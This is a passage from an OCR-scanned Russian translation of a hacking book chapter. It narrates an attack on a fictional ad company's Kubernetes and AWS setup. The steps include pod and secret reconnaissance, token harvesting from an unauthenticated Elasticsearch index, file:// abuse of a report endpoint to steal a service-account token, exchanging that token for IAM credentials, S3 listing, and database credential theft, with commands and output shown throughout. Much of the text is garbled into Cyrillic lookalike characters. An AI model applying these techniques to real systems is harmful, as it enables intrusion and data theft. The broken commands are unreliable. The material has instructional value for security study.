1р-192-168-12-123.еџ-... 55р-Ғеейег-ер1оутепі-13Ғе-Зеух 
1р-192-168-89-110.еџ-... гедіѕ-йер1-694с-0у51Ғ 
1р-192-168-72-204.еи-... аиџаі-е1аѕїіс-дер1 -3ӣбс-3догх 


Эта довольно очевидная команда отображает только поля ѕрес.пойе- 
Мате и теёайаќа. пате манифестов подов. Давайте получим некоторые 
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дополнительные данные, такие как секреты, учетные записи служб, 
ІР-адреса подов и так далее. Как вы можете видеть в листинге 8.4, 
фильтр стал более замысловатым, но ему приходится просеивать за 
вас массивы и карты ҮАМІ для извлечения нужной информации. 


Листинг 8.4. Полная разведка на уровне пространства имен: имена узлов 
и модулей, ІР-адреса модулей, учетные записи служб и секреты 


ѕһе11> ./ Кибес{1 деф ройѕ -о="сиѕот-со1итпѕ=\ 

МОРЕ: .зрес.подеМаме, \ 

РОЮ: .теадаа. пате, \ 

РОРІР: .ѕаёиѕ.ройїр, \ 

ЗЕВМТСЕ: . ѕрес. ѕегуісеАссоџпё, \ 

ЕМУ: .ѕрес.сопёаіпегѕ[*].епу[* ].ма1џеЕгот. ѕесгеКеувВе#, \ 
ЕТЬЕЗЕСВЕТ: .ѕрес.уо1итеѕ[*].ѕесгеЁ. зесге Маме" 


М№ОрЕ РОр РООТР ЗЕВУТСЕ ЕМУ ЕТЕЕЗЕСВЕТ 
1р-192... арі-... 10.0.2... арі-океп ФБСоге... ар\-фоКеп-... 
1р-192... 55р-Ғ... 10.10... деҒаџі& аБСаѕѕ... деРа\{-... 
1р-192... 55р-г... 10.0.3... ЯеҒаш1& <попе> аеҒаџ1+-.. 
1р-192... аџаӣії... 10.20... деҒаџі& <попе> аеҒаџ1+-.. 
1р-192... пехиЅ... 10.20.... ЯеҒаш1& <попе> аер1оу-ѕесгеї. . 


Я обрезал вывод, чтобы он поместился на странице, поэтому опишу 
его здесь. Первые два столбца содержат имена узла и пода, которые 
помогают нам сделать вывод о характере приложения, работающего 
внутри. Третий столбец - это ІР-адрес модуля, который приводит нас 
прямо к приложению благодаря плоской сетевой архитектуре Киђег- 
пе(ез. 

В четвертом столбце перечислены учетные записи службы, привя- 
занные к каждому поду. Любое значение, отличное от значения по 
умолчанию, означает, что под, скорее всего, работает с дополнитель- 
ными привилегиями. 

В последних двух столбцах перечислены секреты, загруженные мо- 
дулем либо через переменные среды, либо через файл, смонтирован- 
ный на диске. Секретами могут быть пароли к базе данных, токены 
учетной записи службы, подобные той, что мы использовали для вы- 
полнения этой команды, и так далее. 

Какое прекрасное время, чтобы быть хакером! Помните, как при- 
ходилось сканировать сеть /16 и ждать четыре часа, чтобы полу- 
чить хоть немного похожий результат? Теперь это всего лишь одна 
команда. Конечно, если бы у учетной записи службы по умолчанию 
не было привилегии «получить поды», нам пришлось бы прибегнуть 
к слепому сканированию сети диапазона ІР-адресов нашего контей- 
нера. АМ очень болезненно реагирует на столь необычный сетевой 
трафик, поэтому будьте осторожны при настройке Мтар, чтобы оста- 
ваться незамеченным. 

Имена подов, которые мы получили в листинге 8.4, полны реклам- 
ных и технических терминов, таких как $$Р, арі, Кака и т. д. Можно 
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с уверенностью предположить, что МХЕ А4$ запускает все свои при- 
ложения, участвующие в процессе доставки рекламы, в Кибегпе(ез. 
Это позволит им масштабировать свои приложения вверх и вниз 
в зависимости от трафика. Мы продолжаем изучать другие поды и на- 
тыкаемся на контейнеры, которые в буквальном смысле загружают 
учетные данные А\М/5. Кажется, здесь становится жарко: 


МОРЕ 1р-192-168-162-215.еи-мез{-1.сотри*е.1п{егпа\. 
РОБ сгеаїіме-ѕсап-дер1-1301-95иКх 

РООТР 10.20.98.12 

РОВТ 5000 

ЗЕВ\УТСЕ аеҒац1& 

ЕМУ АМЅ_ЅСАМ№ АССЕЅЅКЕҮ, АМ$_5САМ ЅЕСКЕТ 


ЕІГЕЅЕСАЕТ деҒаџ1& - Еокеп-2трсд 


Мы также заметили пару хранилищ данных, таких как Вед! и Е1аѕ- 
сісѕеагсһ. Будет интересно. 


Взлом хранилищ данных 


Нашим самым важным преимуществом сейчас является тот факт, что 
нам удалось пересечь границу брандмауэра. Мы находимся внутри 
кластера, в так называемой доверенной зоне. 

Администраторы ОеуОрз по-прежнему находятся в плену иллю- 
зии, что существует такая вещь, как доверенная сеть, даже если эта 
проклятая штука принадлежит облачному провайдеру. Статья Джона 
Ламберта о мышлении защитника (ћіїрѕ ;//9іёћир.сот/оһпіатмС̧/Ѕһагеа) 
по-прежнему актуальна: «Защитники мыслят списками. Нападающие 
мыслят графами. Пока это так, нападающие побеждают». 

Кеаӣіѕ – это база данных памяти типа «ключ-значение», которая 
в основном используется для целей кеширования, а Е1аѕіісѕеагсћ - это 
база данных на основе документов, предназначенная для запросов 
текстового поиска. Из описания этого модуля мы делаем вывод, что 
Еазасзеагсй используется для хранения журналов аудита некоторых, 
а может быть, и всех приложений: 


МОрЕ 1р-192-168-72-204.еџ-меѕ-1.сотриёе.іпёегпаї 
РОБ аидіЄ -е1аѕёіс-дер1 - Зӣбс-3402х 

РООТР 10.20.86.24 

РОВТ 9200 

ЗЕВ\УТСЕ еРаи\{ 

ЕМУ. <попе> 


ЕІГЕЅЕСАЕТ деҒаџ1& - Еокеп-2трсд 


Аутентификация и шифрование - это первые меры, от которых от- 
казались из-за бессмысленной уверенности в доверенной сети. Мне 
еще предстоит наткнуться на базу данных Кейіѕ во внутренней сети, 
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которая требует аутентификации. То же самое касается Еаѕіісѕеагсћ 
и других известных нереляционных баз данных, которые словно 
в шутку просят администраторов запускать приложение в «безопас- 
ной» среде, что бы это ни значило. 

Я понимаю ход их мысли. Предполагается, что безопасность - это 
не работа администратора; он занят обеспечением быстродействия, 
доступности и согласованности данных. Но такое мышление не прос- 
то порочно, оно безрассудно. Безопасность является главным требо- 
ванием любой технологии, управляемой данными. Данные содержат 
информацию. Информация равна власти. Так было стех пор, каклюди 
научились сплетничать. Игнорирование безопасности со стороны ад- 
министраторов похоже на заявление сотрудников атомной электро- 
станции о том, что их единственная задача – расщеплять изотопы 
урана. Меры предосторожности? «Нет, а зачем? Мы ведь запускаем 
реактор в охраняемом здании». 

Сначала мы сосредоточимся на модулях Е1аѕќісѕеагсһ, поскольку 
журналы аудита всегда оказываются ценным источником информа- 
ции. Обычно в них задокументировано, какая служба взаимодейству- 
ет с какой базой данных, какие конечные точки ОВГ-адресов активны 
и как выглядят запросы к базе данных. Мы даже можем найти пароли 
в переменных среды, небрежно сброшенных в трассировку стека от- 
ладки. 

Мы возвращаемся к описанию модуля Е1аѕїісѕеагсһ, извлекаем ІР- 
адрес модуля (10.20.86.24) и порт (9200) и готовимся запросить служ- 
бу. База данных Е1аѕіісѕеагсһ по умолчанию поставляется с нулевой 
аутентификацией, поэтому благодаря сказке о «доверенной среде» 
у нас есть полный доступ к хранящимся в ней данным. 

Еазасзеагсй организует свои данные в индексы, которые представ- 
ляют собой просто наборы документов. Мы можем рассматривать 
индекс как эквивалент базы данных в традиционной системе реля- 
ционных баз данных, такой как МуЗОГ. Итак, мы получаем список 
индексов, определенных в кластере: 


ѕһе11> сиг1 «10.20.86.24:9200/ саё/іпдісеѕ?у» 


һеа1Еһ іпаех 14 ѕіғе 

уе1Лом ёеѕі СХ9рІҒ7550СР2АО1 Ғе60у0... 4.4КЬ 
уе1 Лом 1095 дтЬ10У2285С1Х905КЈА5ҮМ... 154.49Ь 
уе1Лом еу 1032 СЕсА&20дапр04+уК0... 4.4КЬ 


Мы видим, что 154 ГБ данных журнала аудита готовы для изучения. 
Вытащим последнюю пару документов из индекса журнала: 


ѕһе11> сиг1 “10.20.86.24:9200/109/_ѕеагсһ?ргеёу&ѕіғе=4” 
"Һе": [{ 


--5пір- - 
"_ѕоџигсе": { 
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Ө "соигсе": "даѕһбоагӣ-7654-1235", 
"Леме1": "іпғҒо", 

Ө "теѕѕаде": "СЕТ /арі /даѕһбоагд/сатраідп.. .\п 
Ноѕї: ар\-соге\пАиЕПогА та оп Веагег 90с120279Ғее485...", 
"Еімеѕатр": "2019 -11-10714:34:46.648883" 

21 


Поле меззаде каждого из четырех элементов, возвращаемых Е1аѕ- 
сісѕеагсһ, содержит сохраненное необработанное сообщение журнала. 
Мы обнаруживаем текст, который выглядит как НТТР-запрос по адре- 
су ар\/даПБоаг4/сатра\9п/1395412512 Ө. Мы также находим ссылку 
на приложение информационной панели, которое мы заметили еще 
на этапе внешней разведки в главе 4 Ө. ОКІ-адрес в журнале ауди- 
та предполагает, что данные кампании, загружаемые приложением 
информационной панели, вероятно, извлекаются из некоторой внут- 
ренней конечной точки с именем ар\-соге (заголовок Но${) Ө. 

Интересно, что добытое нами НТТР-сообщение содержит токен 
авторизации, вероятно, для идентификации пользователя, запраши- 
вающего данные. Мы можем выделить все токены, хранящиеся в ин- 
дексе журнала, применив соответствующий поисковый фильтр Е1аѕ- 
сісѕеагсһ, а именно теѕѕаде:АџЁһогіғаїіоп. Он должен позволить нам 
собрать достаточно токенов, чтобы идентифицировать всех активных 
пользователей в приложении панели управления: 


ѕһе11> сиг1 “10.20.86.24:9200/109/_ѕеагсһ?ргеёу&512е=1284=теѕѕаде:АџЕһогіға+іоп” 


"_Еітеѕатр": 1600579234 
"меѕѕаде": "...Ноѕі: арі-соге\пАџЁһогіғаїіоп Веагег 8635604Бераз4с1аБЬ247#бБаа5ӣаебс..." 


"_Еітеѕёатр": 1600581600 
"меѕѕаде": "...Ноѕі: арі-соге\пАџЁһогіғаїіоп Веагег 9947с710524965490115614351274695..." 
- -Сокращено- - 


Неплохо - у нас есть более дюжины токенов, использованных за по- 
следние 12 часов для доступа к приложению панели управления и, как 
следствие, к подам ядра АРІ. Надеюсь, некоторые из них все еще будут 
действительны и могут быть использованы для повторной атаки. 

Мы можем получить доступ к подам, связанным с именем службы 
арі -соге благодаря автоматическому разрешению № в Киђегпеїеѕ. 
Кроме того, мы всегда можем просто получить ІР-адрес одного из по- 
дов, например: 


ѕһе11> КиБес+1 де ройѕ -о мійе | дгер “арі-соге” 


МОрЕ 1р-192-168-162-215.еџ-меѕі-1. сотриќе.іпёегпа1 


РОБ ар\-соге-дер\оутеп*-934с-74ахт 
РОрІР 10.0.2.34 
РОАТ 8080 
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Воспользуемся случайным адресом, который мы извлекли из ин- 
декса аудита, вместе с токеном авторизации: 


ѕһе11> сиг1 һр: //10.0.2.34/арі/даѕһоага/сатраї9п/1395412512 \ 
-Н "Аџёһогіғаїіоп: Веагег 8635Ь04БеБаз4с1аБЬ247#6бБааѕіаебс" 

{ 

"ргодгеѕ5": "0.3", 

"ІпѕегёіопІр": "12387642", 


"сгеаіме": "544. тхгайѕ. сот/7БсаҒе206ей7с1159Ь6015267/...", Ө 
"сарріпд": "40", 

"БіаҒасёог": "10", 

- -Сокращено- - 


Мы внутри! У нас может не быть доступа к красивым информаци- 
онным панелям для визуализации показателей - во всяком случае, 
пока, – но мы, наконец, мельком увидели часть необработанных дан- 
ных кампании. В качестве бонуса мы получили местоположение ви- 
деофайлов и изображений, отображаемых в объявлениях ®. Давайте 
посмотрим, что это за адрес: 


гоо@Ро\п{1: /# дефепЕ -Е һоѕѕ 541. тхгайѕ.сот 
13.225.38.103 541. тхгайѕ.соп. 53.атагопаиѕ. сом 


Какой сюрприз, он перенаправляет на бакет $3. К сожалению, нам 
не разрешено получать перечень его содержимого, а ключи наверня- 
ка слишком сложны для подбора. Может быть, АРІ предоставляет спо- 
соб поиска по имени клиента, чтобы облегчить наше бремя? 


Исследование АРІ 


Попробуем найти метод в АРІ для перечисления имен клиентов, ви- 
део и всего остального, что может иметь значение. Мы начинаем 
экспериментировать с АРІ, отправляя неверные идентификаторы 
и случайные ОКІ-адреса вместе с нашим действительным токеном 
в надежде вызвать какое-либо справочное сообщение или подробную 
ошибку: 


ѕһе11> сиг1 “Һр: //10.0.2.34/арі/гапіотРа+һ” \ 
-Н “АџЕћһогіғаіоп: Веагег 8635604БеБіз4с1аЬЬ247#6Баа5іаебс” 


{ "Леме1" : "сгіёіса1" , "теѕѕаде" : "Раћ поё Ғоџпа. Р1еаѕе геЁег фо {Ве йосѕ 
(/90с$/\3) Рог тоге 1пРогма оп"... 


Нас перенаправляют на какой-то ОВГ-адрес документации. Один 
запрос к ОВГ-адресу /їосѕ/%3 раскрывает всю документацию АРІ: ка- 
кие конечные точки доступны, параметры для отправки, заголовки 
и многое другое. Как мило с их стороны! 
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Оказывается, наша догадка была не так уж далека от истины: то- 
кен авторизации действительно привязан к конечному пользователю 
и действителен в рамках его рекламных кампаний. Случайные токе- 
ны, которые мы добыли, вряд ли подходят для просмотра или редак- 
тирования кампаний бтеїѕсһ РоНсо (если, конечно, там не окажется 
активного пользователя или администратора СР, который в настоя- 
щее время общается с модулем арі -соге, – ну и ладно, мы знаем, что 
сейчас не Рождество, и не надеемся на чудо). 

Документы ясно дают понять, что конечная точка АРІ-ядра явля- 
ется точкой входа буквально для каждого приложения доставки, ис- 
пользуемого МХЕ А4$. Это их основной уровень абстракции базы дан- 
ных. Он объединяет бизнес-информацию из нескольких источников 
данных и обеспечивает единый унифицированный обзор процесса 
доставки. 

Помимо обычных команд, которые вы ожидаете от всемогущего 
АРІ (выборка кампаний, вставка списков, поиск списков исключений 
ит. д.), в документации упоминается дополнительная функция, ко- 
торая будоражит нашу хакерскую интуицию: отчеты об использова- 
нии. Эта функция описывается следующим образом: «конечная точка 
[чзаде-герог+ создает файл отчета с подробным описанием работо- 
способности АРІ и несколькими показателями для отслеживания его 
производительности и конфигурации». 

Конфигурация - это хорошо. Нам нравится слово «конфигурация». 
Данные конфигурации часто содержат пароли, определения конеч- 
ных точек и другие секреты АРІ. Но есть еще кое-что. Тот файл отчета, 
который они упомянули... как он генерируется? Как его получают? 
Можем ли мы его скачать? Если да, можем ли мы подменить ОВГ- 
адрес, чтобы вместо этого получить другой файл? Есть ли проверки? 
Динамическая генерация отчетов может послужить нам точкой входа. 

Давайте попробуем применить эту функцию отчетов об использо- 
вании по прямому назначению. Мы пытаемся создать отчет, чтобы 
изучить его более внимательно: 


ѕһе11> сиг1 һер: //10.0.2.34/иѕаде-герогұ/депегаёе» 
-Н “Аџёћогіғаіоп: Веагег 8635Ь04БеБаіз4с1аБЬ247#6Баа5іаебс” 


| 


"ѕёаЁиѕ": "зиссез$", 
"герог": "арі -соге/иѕаде-герогЁ/#АЛе/?омп1оай=53: / /тхгайѕ-герогЕѕ /984е2саБе!812354еа44 


Һм" 


ѕһе11> сиг1 арі-соге/иѕаде-герог/ҒЛе/?оип\оай=53: / /мхгад$ -герогѕ/98йе2саБе#81235йеай4.һЕті. 


- -Сокращено- - 

Іпёегпа1 сопЁідигаёіоп: 
[афепсу теЁгісѕ: 
ЕпуігоптепЁ: 

РАТН_ІМҒО: ' /иѕаде-герог' 


РИО '/ар\/' 
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ЗНЕН. ' /Біп/Баѕһ/' 

АМЅ ВОГЕ АВМ 'агп:амѕ :іат: :886477354405:го1е/арі-соге.ес2' Ө 
АМ$_МЕВ_ТОЕМТТТУ_ТОКЕМ_ЕТЕЕ ' /маг/гип/ѕесгеѕ /еК$ .атагопамѕ . сот/ ѕегуісеассоџпё/ёокеп'Ө 
ОВ_ СОВЕ РАЅ5 **жжжжжяжя 

ЮВ СОКЕ _ЏЅЕА ********** 


ОВЕМОРОТМТ=984195 . сећтгус73919.еи-меѕі-1.гѕ.атагопаиѕ.соп Ө 
- -Сокращено- - 


Действительно очень интересно! К счастью для МХК Ай, разработ- 
чики генератора отчетов об использовании замаскировали пользо- 
вателя и пароль базы данных, поэтому простого доступа к ней нет, 
но мы все равно получили конечную точку базы данных Ө: 984195. 
сеһћтгус73919.еџ-меѕї-1.гіѕ.атагопанѕ. соп. Очевидно, данные извле- 
каются из управляемой реляционной базы данных на АМ – службы 
под названием Вр. 

Но пока не обращайте внимания на базу данных. У нас есть еще 
кое-что интересное. 

Дальше мы сосредоточимся на двух специальных переменных: 
АМЅ КОЕ ААМ и АМ$_МЕВ_ТОЕМТТТУ ТОКЕМ_ЕТЕЕ. Согласно документации 
АМТ, эти две переменные вводятся управляемой версией Киђегпеѓеѕ 
(ЕК5) от АМГ$ всякий раз, когда роль ІАМ прикрепляется к учетной 
записи службы. Здесь под арі -соге может обменять свой токен аутен- 
тификации Киђегпеѓеѕ на обычные ключи доступа ІАМ, которые дают 
привилегии роли арі-соге.ес2 Ө. Отличное повышение привилегий! 


У компаний с другой архитектурой может не быть 
иного выбора, кроме как разрешить всем подам, работающим на дан- 
ном узле, реализовать роль, назначенную этому узлу. Тогда наша рабо- 
та становится намного легче. Некоторые компании будут проксиро- 
вать все запросы, используя такой инструмент, как КиБе?\4ам, чтобы 
ограничить охват пода. 


Было бы интересно загрузить токен служебной учетной записи, 
хранящийся в файле, на который ссылается АМ$_МЕВ_ТОЕМТТТУ ТОКЕМ№_ 
ЕТЕЕ, и обменять его на ключи доступа ТАМ, чтобы увидеть, кчему мы 
можем получить доступ с помощью этих ключей, а к чему нет. 

Функция џѕаде-герогі вполне может помочь нам в этом начина- 
нии. ОВГ загрузки указывает на адрес 53, но есть вероятность, что он 
также принимает другие обработчики ОВІ-адресов, такие как Це: // 
для загрузки документов с диска, например файл токена службы АМЅ_ 
НЕВ_ТОЕМТТТУ _ТОКЕМ_ЕТЕЕ Ө: 


ѕһе11> сиг1 арі-соге/иѕаде-герогЕ/#1е?оип\оай=\ 
ЕЦе: ///маг/гип/ѕесгеёѕ /еК$ .атахопам$ .сот/ѕегуісеассоипё/&океп 


еујһЫЬсс101750211№151трлСІ61т0хМ№МҮ4М2 си) 1527 СВ 0СМ)У217М)ВАУ7Е]7СМи\ИУ47м. .. 
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Как же хорошо, когда все идет так, как задумано! Мы получили 
токен аккаунта службы. Посмотрим, сможем ли мы обменять его на 
ключи [АМ. Если мы расшифруем этот токен и сравним его с МТ по 
умолчанию, который мы получили ранее, то заметим некоторые важ- 
ные отличия: 


{ 
Ө "аид": ["5%5.амахопам$.сот"], 
"ехр": 1574000351, 
Ө "155": "Һер: //о14с.еК$.ец-мез{-1.атахопаи$ .сот/19/4ВАЕ8Е5", 
"Кирегпеёеѕ.10о": { 
"патеѕрасе": "ргоа", 
- - Сокращено- - 
"ѕегуісеассоџпі": { 
"пате": "арі -соге-ассоипі", 
"иа": "#943861а-0876-11еа-905#-06с1618с2сс" 
} 
"ѕир": "ѕуѕет: ѕегуісеассоџпі:ргой:арі -соге-ассоџпі" 


} 


Токен служебной учетной записи имеет свойство «прослушивание» 
(аид) Ө, т. е. это сервер ресурсов, который примет токен, который мы 
только что расшифровали. Здесь этот параметр настроен на $Т$ - сер- 
вис А\М/$, который предоставляет временные учетные данные ТАМ. 
Эмитент токена @ больше не является контроллером учетной записи 
службы, а вместо этого представляет собой сервер ОрепТЮ, предостав- 
ляемый вместе с кластером ЕК$. Орелір - это стандарт аутентифи- 
кации, используемый для делегирования аутентификации третьей 
стороне. ІАМ АМ доверяет данному серверу Орепір правильную 
подпись и аутентификацию утверждений в этом МТ. 

В соответствии с документацией АМ, если все настроено правиль- 
но, роль [АМ ар\-соге.ес2 также будет настроена на доверие запросам 
на реализацию роли, выдаваемым этим сервером ОрепО и имеющим 
заявку ѕуѕіет: зегу1сеассоип* : ргод : ар\-соге-ассочцпе. 

В ответ на вызов АРІ амѕ 55 ассері- го1е-кі+ћ-меБ-ійепіі+у в со- 
провождении необходимой информации (веб-токен и имя роли) мы 
должны получить действительные учетные данные ІАМ: 


гооєё@Роіпёег1: /# АМ$_ВОЕЕ_АВМ=”агп:ам$ : іам: : 886477354405: го1е/арі-соге.ес2” 
гооі@Роіпёег1: /# ТОКЕМ =”еи3аБатеетете*...” 


гоої@Роіпёег1: /# амѕ 545 аѕѕите-го1е-міЁһ-меБ-ійепёі+у \ 
--го1е-агп $АИ$_ВОЕЕ_АВМ \ 

--го1е-5е$$1оп-пате ѕеѕѕіопІр \ 

- -мер-ійепёі+у-Еокеп $ТОКЕМ \ 

--йигаёіоп-ѕесопӣѕ 43200 


"Сгедеп\а1.5": { 
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"бесге{АссеззКеу": "ҮЕдЕХЅҒЈЬЗІНАОАОАЕАС/І+" , 
"АссеѕѕКеуІа": "АЅІА447АКбАЅҮХМС5ҮХб" , 
"Ехрігаіоп": "2019-10-30719:57:417", 
"ЅеѕѕіопТокеп": "Е0оС2ХІУҮХа2ЕМ3..." 
}, 
- -Сокращено- - 


} 


Аллилуйя! Мы только что обновили наш сервисный токен Киђег- 
пеїеѕ до роли ІАМ, способной взаимодействовать с сервисами АМ. 
Какой ущерб мы можем нанести, обладая новым типом доступа? 


Злоупотребление привилегиями роли [АМ 


Приложение арі -соге управляет кампаниями, имеет ссылки на мате- 
риалы, размещенные на $3, и обладает множеством дополнительных 
возможностей. Можно с уверенностью предположить, что связанная 
роль ТАМ имеет какие-то расширенные привилегии. Начнем с оче- 
видного, чем нас дразнили с самого начала, – списка бакетов на 53: 


гооЁ@Роіпїег1: /# амз 53арі 11$4-БисКее$ 


{ 
"ВисКе{$": [ 
{ 

"Маме": "тхгайѕ-ЁеггаҒогт", 
"Сгеаёіопраёе": "2017-10-25121:26:10.0007" 
"Мате": "мхгад$-109$-еи", 
"Сгеаёіопраёе": "2019-10-27119:13:12.0007" 
"Мате": "тхгаїѕ-ЯБ-ѕпарѕһоїѕ", 
"Сгеаёіопраёе": "2019-10-26116:12:05.0007" 

--5п1р- - 


Наконец-то! После бесчисленных попыток нам удалось получить 
роль ІАМ с разрешением [15{ВисКет5. Это был долгий путь! 

Однако пока не слишком радуйтесь. Мы действительно можем по- 
лучить список бакетов, но это еще не говорит о нашей способности 
извлекать отдельные файлы из этих бакетов. Однако, просто взглянув 
на список бакетов, мы получаем новое представление о методах ра- 
боты МХК Ад$. 

Например, корзина тхгайѕ - {еггаФогм, скорее всего, хранит состоя- 
ние, созданное Тегтаѓогт – инструментом, используемым для установ- 
ки и настройки облачных ресурсов, таких как серверы, базы данных 
и сеть. Состояние - это декларативное описание всех активов, создан- 
ных и управляемых Теггаѓогт, таких как ІР-адрес сервера, подсети, 
роль ІАМ, разрешения, связанные с каждой ролью и пользователем, 
и т. д. Более того, состояние хранит пароли в открытом виде. Даже 
если наша жертва использует инструмент управления секретами, 
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такой как Уаи, АМ/5 Кеу Мапаветепї Ѕегуісе (КМ5) или АМ Ѕесгеїѕ 
Мапаеег, Теггаѓіогт расшифрует их на лету и сохранит их открытую 
версию в файле состояния. О, мы на все готовы, чтобы получить до- 
ступ к этому бакету. Давайте попробуем: 


гооЁ@Роіпё1:~/# амѕ 53арі 115&-оБјесіѕ-у2 --БискеЁ тхгайѕ-ЁеггаЁогт 


Ап еггог оссиггед (Ассеѕ5репіей) мһћеп са111пд {Ве 115#06јес 5\2 орегаїіоп: 
Ассеѕ5 Репіей 


Увы, не повезло. Всему свое время. Вернемся к нашему списку ба- 
кетов. 

Мы уверены, что есть по крайней мере один бакет, к которому при- 
ложение арі-соге должно иметь доступ. Это 541. пхгайѕ.сот, бакет, 
в котором хранятся все рекламные материалы. Воспользуемся наши- 
ми привилегиями ІАМ для вывода списка содержимого бакета: 


гоої@Роіпё1:~/# амѕ 53арі 115-оБјесіѕ-у2 --БисКее 540.пхгайѕ.сот > 1151 _сгеаімеѕ.іхі 
гооє@Роіп1:~/# һеай 115 сгеаёімеѕ.ЕхЕ 
{"Сопёепіѕ": [{ 

"Кеу": "2аей773247#020305е672сЬ/1250ай49652436/ү14/720/баа58ес9Ғ77аҒдсдса497#90с.тр4", 


"раѕМоді Ғіеа": "2015-04-08722:01:48.0007", 
- - Сокращено- - 


Хм... да, у нас есть доступ ко всем видео и изображениям, которые 
МХК Ад$ использует в своих рекламных кампаниях, но мы не соби- 
раемся загружать и воспроизводить терабайты медиарекламы только 
для того, чтобы найти те, которые использует Стеѓѕсһ Ро со. Должен 
быть лучший способ проверить эти файлы. 

И он есть. Помните токен учетной записи службы Кибегпеѓеѕ, кото- 
рый мы получили несколько минут назад? Мы так поспешно преобра- 
зовали его в учетные данные А\$, что почти забыли о привилегиях, 
которыми он обладал сам по себе. Эта учетная запись службы явля- 
ется золотым пропуском для получения ресурсов кластера, связан- 
ных с подом арі -соге. И угадайте, какие свойства арі -соге нужны для 
работы? Учетные данные базы данных! Мы воспользуемся доступом 
к базе данных, чтобы определить искомые материалы Сбтеѓіѕсһ Ро!іісо, 
а затем недавно полученным доступом к ГАМ для загрузки этих видео 
с55: 


Злоупотребление привилегиями учетной записи службы 


Мы возвращаемся к нашей верной оболочке обратного вызова и от- 
правляем новую команду суг\ на сервер АРІ, на этот раз с АРІ-ядром 
ТУТ. Запрашиваем секреты, найденные в описании пода, іБСогераѕѕ- 
мога: 
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ѕһе11> ехрогЕ ТОКЕ№"емЈабагеїғехеї..." 
ѕһе11> сиг1 -1К \ 
һеЄрѕ : //10.100.0.1/арі/%1/патеѕрасеѕ /ргод /зесге{$ /дБСогераѕѕмога \ 
--һеайег "АџЁһогіғаїіоп: Веагег $ТОКЕМ" 
{ 
"Кіпа": "ЅесгеЁ", 
"Дафа": { 
"изег": "ҮХВр.ММ№устуЕспс=", 
"раѕѕмогӣ": "ек81акхХЬсауВ2 80275" }} 


Затем мы расшифровываем пользователя и пароль: 


гооЁ@Роіпї1:~/# есһо ҮХВр.И№устуЕспс= |Баѕеб4 -а 

арі -соге- ги 

гооЁ@Роіпї1:~/# есһо ек81акхХЬСсауд20В0275 |Базеб4 -4 
205јн19гСТАЅ61 


И вуаля, учетные данные базы данных кампании - ар\-соге-ги/20- 
5јМ19г07А561. 


Проникновение в базу данных 


Давайте инициируем подключение к базе данных из кластера на тот 
случай, если экземпляр ВО$ защищен правилами брандмауэра для вхо- 
дящих соединений. Мы не знаем точно, к какой базе данных мы будем 
обращаться (КЮ поддерживает МУЗОГ, Апгога, ОгасІе, 501. Ѕегуег и дру- 
гие). Поскольку МУЗОТ, – самый популярный движок, начнем с него: 


ѕһе11> ехрогЕ ОВЗЕВ\ЕВ=984195 . сеһпгус73919.еи-меѕ-1.гӣѕ .апагопаиѕ. сот 


ѕһе11> арЕ іпѕёа11 -у туѕа1-с\1іепё 
ѕһе11> туѕд1 -һ ЗОВЗЕВУЕВ -и арі-соге-ги -р205ј919гС7А561 -е “һом да+аБаѕеѕ;” 


| ілпҒогтаёіоп_ѕсһета | 
| се | 

| сатраідпѕ | 
| Біддаќа | 

| Сахопому | 
--Ѕпір- - 


Мы внутри. 

Поиск кампаний бтеіѕсһ Роібісо требует элементарных навыков 
работы с 501, которые я не буду здесь подробно описывать. Начнем 
с получения списков всех столбцов, таблиц и баз данных на сервере. 
Эта информация доступна в базе данных іпЁогтаёіоп_ѕсһета в табли- 
це СОЦОММ. МАМЕ: 
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ѕһе11> му$91 -һ $ОВЗЕВУЕВ -и арі-соге-ги -р2051/19гб7А$61. -е\ 
“ѕе1ес СОЦИММ_МАМЕ ‚ ТАВЕЕ_МАМЕ, ТАВЕЕ_$СНЕМА , ТАВЕЕ_САТАЕОС Фгом іпҒогтаіоп_ѕсһета.со\1импѕ;” 


еее Я СЕГЕ + 
| СОСОММ МАМЕ | ТАВІЕ МАМЕ | ТАВІЕ_ЅСНЕМА | 
СЕНГЕ Яе ЕСЕГЕ + 
| соџпуёег | іпѕегЁіопѕ | арх | 
| 19 епёіёу | іпѕегЁіопѕ | арі | 
| тах Бийде | іпѕегЁіопѕ | арі | 
- -Сокращено- - 


Мы выбираем несколько столбцов и таблиц, которые, скорее всего, 
содержат данные кампании, а затем запрашиваем информацию с по- 
мощью пары операторов ѕе1есі, перемежающихся операциями јоіп. 
Этот запрос должен дать нам список кампаний, ОКІ-адреса реклам- 
ных материалов и бюджет каждой кампании - всю информацию, ко- 
торую мы только можем запросить. Мы снова применяем наши укра- 
денные учетные данные: 


ѕһе11> туѕа1 -һ $ОВЗЕВУЕВ -и арі-соге-ги -р205)1\19гб7А$61 сатраідпѕ -е\ 
“ѕе1есё ее.паме, рр.етаі1, рр.һаѕһ, іі.сгеа+іме, 1ї.соџпёег, 11 .тах_БийдеЁ\ 
гот іпѕегЕіопѕ 1“ \ 

іппег јоіп епёіу ее оп ее.ій= 11.10 _епёі+у\ 

іппег јоіп ргоҒіЛе рр оп рр.1й_епёі+у= 11.14 _епёі+у\ 

мћеге ее.паме 11ке ‘%дгеезсв%?” 


Маме : Сгеёѕсһћ Ро11&ісо 

Ема\1: е1оіѕе. ѕ#іпѕоп@дгеіѕсһро14і&ісо. сом 

Наѕћ: с22#е077аассьс64115са137#сЗа9ісҒ 

Сгеаїіме: 541. тхгайѕ.сот/43е0901472118030546734еа20дсЬ/ 
12айад49658582436/у14/720/8864аБзӣ165с1сҒ2.тр4 

Соипфег: 16879 

МахБибде: 250000 


- - Сокращено- - 


Похоже, что клиенты СР тратят сотни тысяч долларов на каждое из 
200 рекламных объявлений, которые в настоящее время показывают- 
ся. Это хорошие деньги. 

Мы перебираем все ОВГ-адреса рекламных материалов, найден- 
ные в базе данных, и извлекаем их из 53. 

Помните время, когда хакерам нужно было тщательно разрабаты- 
вать инструменты и методы эксфильтрации, чтобы обойти меры по 
предотвращению потери данных и по крупицам извлекать данные из 
сети компании? Больше эта морока не нужна. 

Облачному провайдеру все равно, где вы находитесь. Пока у вас 
есть правильные учетные данные, вы можете скачать все, что захо- 
тите. В конце месяца жертва взлома, скорее всего, получит солидный 
счет от провайдера, но это вряд ли вызовет подозрения в бухгалте- 
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рии. В любом случае МХК А4$ постоянно обслуживает большинство 
показов этих видео по всему миру. Мы просто загружаем их все за 
один раз. 

Учитывая количество задействованных объявлений (СР принадле- 
жат несколько сотен), мы будем использовать магию хагд$ для распа- 
раллеливания вызова АРІ деі-објесі. Мы готовим файл со списком 
материалов для выборки, а затем перебираем каждую строку и пере- 
даем ее в хагд5: 


